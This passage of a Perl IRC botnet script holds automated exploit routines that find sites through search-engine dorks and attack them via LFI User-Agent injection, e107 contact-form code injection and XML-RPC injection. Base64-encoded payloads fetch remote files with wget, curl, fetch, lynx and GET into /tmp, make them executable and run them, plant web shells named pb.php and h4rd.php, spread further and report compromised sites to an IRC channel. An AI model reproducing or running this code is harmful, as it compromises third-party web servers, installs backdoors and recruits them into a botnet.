  1430.             else { &msg("$chan","$lfilogo 12(4@0$engine12)(4@9ENVIRON12)11 $vuln"); }
  1431.                
  1432.         } exit; } sleep(2);
  1433. }
  1434. sub lfi_env_query() {
  1435.     my ($url,$code) = @_;
  1436.     my $ua = LWP::UserAgent->new(agent => "<? eval(base64_decode('".$code."')); include('".$injector."'); ".$b0tcmd." ?>");
  1437.     $ua->timeout(7);
  1438.     my $req = HTTP::Request->new(GET => $url);
  1439.     my $res = $ua->request($req);
  1440.     return $res->content;
  1441. }
  1442.  
  1443. sub lfi_spread_query() {
  1444.     my $url = $_[0];
  1445.     my $code = "ZXhlYygnY2QgL3RtcDsgd2dldCAiLiRpbmplY3Rvci4iIC1PIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiI7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiI7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IEdFVCAiLiRpbmplY3Rvci4iPnBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocDsgbHdwLWRvd25sb2FkICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwJyk7IHNoZWxsX2V4ZWMoJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocCcpOyBzeXN0ZW0oJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocCcpOyAgcGFzc3RocnUoJ2NkIC90bXA7IHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBjVXJsIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwOyBjaG1vZCA3NTUgcGIucGhwOyBwaHAgcGIucGhwOyBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHA7IGNobW9kIDc1NSBwYi5waHA7IHBocCBwYi5waHA7IGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocDsgY2htb2QgNzU1IHBiLnBocDsgcGhwIHBiLnBocCcpOw==";
  1446.     my $ua = LWP::UserAgent->new(agent => "<? eval(base64_decode('".encode_base64($code)."')); include('".$injector."'); ".$b0tcmd." ?>");
  1447.     $ua->timeout(7);
  1448.     my $req = HTTP::Request->new(GET => $url);
  1449.     my $res = $ua->request($req);
  1450. }
  1451.  
  1452. ######################## e107
  1453. sub e107() {
  1454.         my ($chan,$bug,$dork,$engine) = @_;
  1455.     my $count = 0;
  1456.     my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
  1457.     my $num = scalar(@list);
  1458.     if ($num > 0) {
  1459.         foreach my $site (@list) {
  1460.             $count++;
  1461.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$e107logo 12(4@0$engine12) 10==14F10=15I10=0N10=0I10=15S10=14H10== "); } }
  1462.             my $test = "http://".$site.$bug;
  1463.             my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1464.             my $html = &e107_rce_query($test,$code);
  1465.             if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
  1466.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1467.                     my $sys = $1;
  1468.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); } elseif(@copy("'.$injector.'","e107_themes/pb.php")) { echo "stun_dthem";@copy("'.$botshell.'","e107_themes/h4rd.php"); } elseif(@copy("'.$injector.'","e107_plugins/pb.php")) { echo "stun_dplug";@copy("'.$botshell.'","e107_plugins/h4rd.php"); } elseif(@copy("'.$injector.'","e107_images/pb.php")) { echo "stun_dima";@copy("'.$botshell.'","e107_images/h4rd.php");} eval(include("'.$injector.'")); '.$b0tcmd.'';
  1469.                     my $res = &e107_rce_query($test,encode_base64($upload));
  1470.                     if ($res =~ /c0liSUKSESc0li/) {
  1471.                                                 &get_content("http://".$site."pb.php"); my $dor = "http://".$site."h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1472.                                         }
  1473.                     elsif ($res =~ /stun_dthem/) {
  1474.                                                 &get_content("http://".$site."e107_themes/pb.php"); my $dor = "http://".$site."e107_themes/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1475.                                         }
  1476.                     elsif ($res =~ /stun_dplug/) {
  1477.                                                 &get_content("http://".$site."e107_plugins/pb.php"); my $dor = "http://".$site."e107_plugins/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1478.                                         }
  1479.                     elsif ($res =~ /stun_dima/) {
  1480.                                                 &get_content("http://".$site."e107_images/pb.php"); my $dor = "http://".$site."e107_images/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1481.                                         }
  1482.                     else {
  1483.                                                 &msg("$chan","$e107logo 12(4@0$engine12)(4@7VULN12)11 ".$test." 12(4@7".$sys."12)(4@0safemode-9OFF12) ");sleep(2);
  1484.                                                 my $dor = "http://".$site."h4rd.php";
  1485.                                                 my $check = &get_content($dor); &get_content("http://".$site."pb.php");
  1486.                                                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/) {
  1487.                                                 &info_main($dor,$chan,$engine,$e107logo);
  1488.                                                 }
  1489.                                         }
  1490.                     &e107_spread_query($test);
  1491.                     sleep(2);
  1492.                 } exit; } sleep(2);
  1493.             }
  1494.             elsif ($html =~ /v0pCr3w<br>sys:(.+?)<br>/) {
  1495.                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1496.                     my $sys = $1;
  1497.                     my $upload = 'if(@copy("'.$injector.'","pb.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","h4rd.php"); } elseif(@copy("'.$injector.'","e107_themes/pb.php")) { echo "stun_dthem";@copy("'.$botshell.'","e107_themes/h4rd.php"); } elseif(@copy("'.$injector.'","e107_plugins/pb.php")) { echo "stun_dplug";@copy("'.$botshell.'","e107_plugins/h4rd.php"); } elseif(@copy("'.$injector.'","e107_images/pb.php")) { echo "stun_dima";@copy("'.$botshell.'","e107_images/h4rd.php");} eval(include("'.$injector.'")); '.$b0tcmd.'';
  1498.                     my $res = &e107_rce_query($test,encode_base64($upload));
  1499.                     if ($res =~ /c0liSUKSESc0li/) {
  1500.                                                 &get_content("http://".$site."pb.php"); my $dor = "http://".$site."h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1501.                                         }
  1502.                     elsif ($res =~ /stun_dthem/) {
  1503.                                                 &get_content("http://".$site."e107_themes/pb.php"); my $dor = "http://".$site."e107_themes/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1504.                                                 }
  1505.                     elsif ($res =~ /stun_dplug/) {
  1506.                                                 &get_content("http://".$site."e107_plugins/pb.php"); my $dor = "http://".$site."e107_plugins/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1507.                                                 }
  1508.                     elsif ($res =~ /stun_dima/) {
  1509.                                                 &get_content("http://".$site."e107_images/pb.php"); my $dor = "http://".$site."e107_images/h4rd.php"; &info_main($dor,$chan,$engine,$e107logo); sleep(1);
  1510.                                                 }
  1511.                     else {
  1512.                                                 &msg("$chan","$e107logo 12(4@0$engine12)(4@7VULN12)11 ".$test." 12(4@7".$sys."12)(4@0safemode-4ON12) ");sleep(2);
  1513.                                                 my $dor = "http://".$site."h4rd.php";
  1514.                                                 my $check = &get_content($dor); &get_content("http://".$site."pb.php");
  1515.                                                 if ($check =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/) {
  1516.                                                 &info_main($dor,$chan,$engine,$e107logo);
  1517.                                                 }
  1518.                                         }
  1519.                                 &e107_spread_query($test);
  1520.                 sleep(2); } exit; }
  1521.             }
  1522.         }
  1523.     }
  1524. }
  1525.  
  1526. sub e107_rce_query() {
  1527.     my ($url,$code) = @_;
  1528.         my $cod2 = "aWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoImNkIC90bXAgJiYgd2dldCAiLiRpbmplY3Rvci4iIC1PIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIHdnZXQgIi4kYm90c2hlbGwuIiAtTyBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBleGVjKCJjZCAvdG1wICYmIGZldGNoIC1PIHBiLnBocCAiLiRpbmplY3Rvci4iICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgZmV0Y2ggLU8gaDRyZC5waHAgIi4kYm90c2hlbGwuIiAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBleGVjKCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAZXhlYygiY2QgL3RtcCAmJiBseW54IC1kdW1wICIuJGluamVjdG9yLiIgcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgbHlueCAtZHVtcCAiLiRib3RzaGVsbC4iIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQGV4ZWMoImNkIC90bXAgJiYgR0VUICIuJGluamVjdG9yLiI+cGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgR0VUICIuJGJvdHNoZWxsLiI+aDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAZXhlYygiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSl7DQpAc2hlbGxfZXhlYygiY2QgL3RtcCAmJiB3Z2V0ICIuJGluamVjdG9yLiIgLU8gcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgd2dldCAiLiRib3RzaGVsbC4iIC1PIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHNoZWxsX2V4ZWMoImNkIC90bXAgJiYgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBmZXRjaCAtTyBoNHJkLnBocCAiLiRib3RzaGVsbC4iICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHNoZWxsX2V4ZWMoImNkIC90bXAgJiYgY1VybCAtTyBwYi5waHAgIi4kaW5qZWN0b3IuIiAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGNVcmwgLU8gaDRyZC5waHAgIi4kYm90c2hlbGwuIiAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBzaGVsbF9leGVjKCJjZCAvdG1wICYmIGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBseW54IC1kdW1wICIuJGJvdHNoZWxsLiIgaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc2hlbGxfZXhlYygiY2QgL3RtcCAmJiBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBHRVQgIi4kYm90c2hlbGwuIj5oNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBzaGVsbF9leGVjKCJjZCAvdG1wICYmIGx3cC1kb3dubG9hZCAiLiRpbmplY3Rvci4iIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGx3cC1kb3dubG9hZCAiLiRib3RzaGVsbC4iIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQHN5c3RlbSgiY2QgL3RtcCAmJiB3Z2V0ICIuJGluamVjdG9yLiIgLU8gcGIucGhwICYmIGNobW9kIDc1NSBwYi5waHAgJiYgcm0gLXJmIHBiLnBocC4qICYmIHBocCBwYi5waHAgJiYgd2dldCAiLiRib3RzaGVsbC4iIC1PIGg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHN5c3RlbSgiY2QgL3RtcCAmJiBmZXRjaCAtTyBwYi5waHAgIi4kaW5qZWN0b3IuIiAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGZldGNoIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIGx5bnggLWR1bXAgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBseW54IC1kdW1wICIuJGJvdHNoZWxsLiIgaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAc3lzdGVtKCJjZCAvdG1wICYmIEdFVCAiLiRpbmplY3Rvci4iPnBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIEdFVCAiLiRib3RzaGVsbC4iPmg0cmQucGhwICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHN5c3RlbSgiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQHBhc3N0aHJ1KCJjZCAvdG1wICYmIHdnZXQgIi4kaW5qZWN0b3IuIiAtTyBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiB3Z2V0ICIuJGJvdHNoZWxsLiIgLU8gaDRyZC5waHAgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAcGFzc3RocnUoImNkIC90bXAgJiYgZmV0Y2ggLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBmZXRjaCAtTyBoNHJkLnBocCAiLiRib3RzaGVsbC4iICYmIGNobW9kIDc1NSBoNHJkLnBocCAmJiBybSAtcmYgaDRyZC5waHAuKiIpOw0KQHBhc3N0aHJ1KCJjZCAvdG1wICYmIGNVcmwgLU8gcGIucGhwICIuJGluamVjdG9yLiIgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBjVXJsIC1PIGg0cmQucGhwICIuJGJvdHNoZWxsLiIgJiYgY2htb2QgNzU1IGg0cmQucGhwICYmIHJtIC1yZiBoNHJkLnBocC4qIik7DQpAcGFzc3RocnUoImNkIC90bXAgJiYgbHlueCAtZHVtcCAiLiRpbmplY3Rvci4iIHBiLnBocCAmJiBjaG1vZCA3NTUgcGIucGhwICYmIHJtIC1yZiBwYi5waHAuKiAmJiBwaHAgcGIucGhwICYmIGx5bnggLWR1bXAgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBwYXNzdGhydSgiY2QgL3RtcCAmJiBHRVQgIi4kaW5qZWN0b3IuIj5wYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBHRVQgIi4kYm90c2hlbGwuIj5oNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCkBwYXNzdGhydSgiY2QgL3RtcCAmJiBsd3AtZG93bmxvYWQgIi4kaW5qZWN0b3IuIiBwYi5waHAgJiYgY2htb2QgNzU1IHBiLnBocCAmJiBybSAtcmYgcGIucGhwLiogJiYgcGhwIHBiLnBocCAmJiBsd3AtZG93bmxvYWQgIi4kYm90c2hlbGwuIiBoNHJkLnBocCAmJiBjaG1vZCA3NTUgaDRyZC5waHAgJiYgcm0gLXJmIGg0cmQucGhwLioiKTsNCn0=";
  1529.         my $cmd = "eval(base64_decode('".$cod2."'));eval(base64_decode('".$code."')); eval(include('".$injector."')); ".$b0tcmd."";
  1530.     my $req = HTTP::Request->new(POST => $url);
  1531.     $req->content_type("application/x-www-form-urlencoded");
  1532.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1533.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1534.     $ua->timeout(7);
  1535.     my $res = $ua->request($req);
  1536.     return $res->content;
  1537. }
  1538.  
  1539. sub e107_spread_query() {
  1540.     my $url = $_[0];
  1541.     my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1542.     my $cmd = "eval(base64_decode('".$code."')); eval(include('".$injector."')); ".$b0tcmd."";
  1543.         my $req = HTTP::Request->new(POST => $url);
  1544.     $req->content_type("application/x-www-form-urlencoded");
  1545.     $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1546.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1547.     $ua->timeout(7);
  1548.     my $res = $ua->request($req);
  1549. }
  1550.  
  1551. ######################## xml
  1552. sub xml() {
  1553.         my ($chan,$bug,$dork,$engine) = @_;
  1554.     my $count = 0;
  1555.     my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
  1556.     my $num = scalar(@list);
  1557.     if ($num > 0) {
  1558.         foreach my $site (@list) {
  1559.             $count++;
  1560.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$xmllogo 12(4@0$engine12) 11==14F11=15I11=0N11=0I11=15S11=14H11== "); } }
  1561.                         my $vuln = "http://".$site.$bug;
  1562.                         #my $test = "http://".$site.$bug;
  1563.                        
  1564.                         #my $html = &get_content($test);
  1565.                         #if ($html =~ /faultCode/ ) {
  1566.  
  1567.                                 my $cda = "echo'-OWNAGE-'; echo getcwd(); echo'_Hihi_'; echo php_uname(); echo'_hihi';";
  1568.                                 my $cdb = "echo'-OWNAGE-'; if(eval(include('".$injector."'))) { echo'-gang-'; } else { ".$b0tcmd." } echo'-OWNAGE-'; ";
  1569.        
  1570.                                 my $tpa = "text/xml";
  1571.                                 my $tpb = "application/xml";
  1572.        
  1573.                                 my $respa = &injxmla($vuln,$cda,$tpa); my $respb = &injxmla($vuln,$cda,$tpb);
  1574.                                 my $respc = &injxmlb($vuln,$cda,$tpa); my $respd = &injxmlb($vuln,$cda,$tpb);
  1575.                                 my $respe = &injxmlc($vuln,$cda,$tpa); my $respf = &injxmlc($vuln,$cda,$tpb);
  1576.                                 my $respg = &injxmld($vuln,$cda,$tpa); my $resph = &injxmld($vuln,$cda,$tpb);
  1577.  
  1578.                                 if ($respa =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1579.                                         if(&xml_uname_check($sys) eq "+") {
  1580.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmla($vuln,$cdb,$tpa); sleep(2);
  1581.                                                         my $code =  "if(fwrite(fopen('".$pwd."/h4rd.php','w'),file_get_contents('".$botshell."'))) { echo'OWNAGE_SUCCESS';fwrite(fopen('".$pwd."/pb.php','w'),file_get_contents('".$injector."')); } elseif(copy('".$botshell."','".$pwd."/h4rd')) { echo'OWNAGE_SUCCESS';copy('".$injector."','".$pwd."/pb'); } else { echo'OWNAGE_FAILED'; } echo'_hihi';";
  1582.                                                         if(&injxmla($vuln,$code,$tpa) =~ /OWNAGE_SUCCESS/s) { &cmdxml_ok($vuln,$site,$chan,$engine,$xmllogo); }
  1583.                                                         &msg("$chan","$xmllogo 12(4@0$engine12)(7@4SYSTEM12)11 ".$vuln." 12(4@7".$sys."12)");
  1584.                                                 sleep(2); } exit; }
  1585.                                         }
  1586.                                 }
  1587.                                 elsif ($respb =~ /-OWNAGE-(.*)_Hihi_(.*)_hihi/s) { my $pwd = $1; my $sys = $2;
  1588.                                         if(&xml_uname_check($sys) eq "+") {
  1589.                                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &injxmla($vuln,$cdb,$tpb); sleep(2);
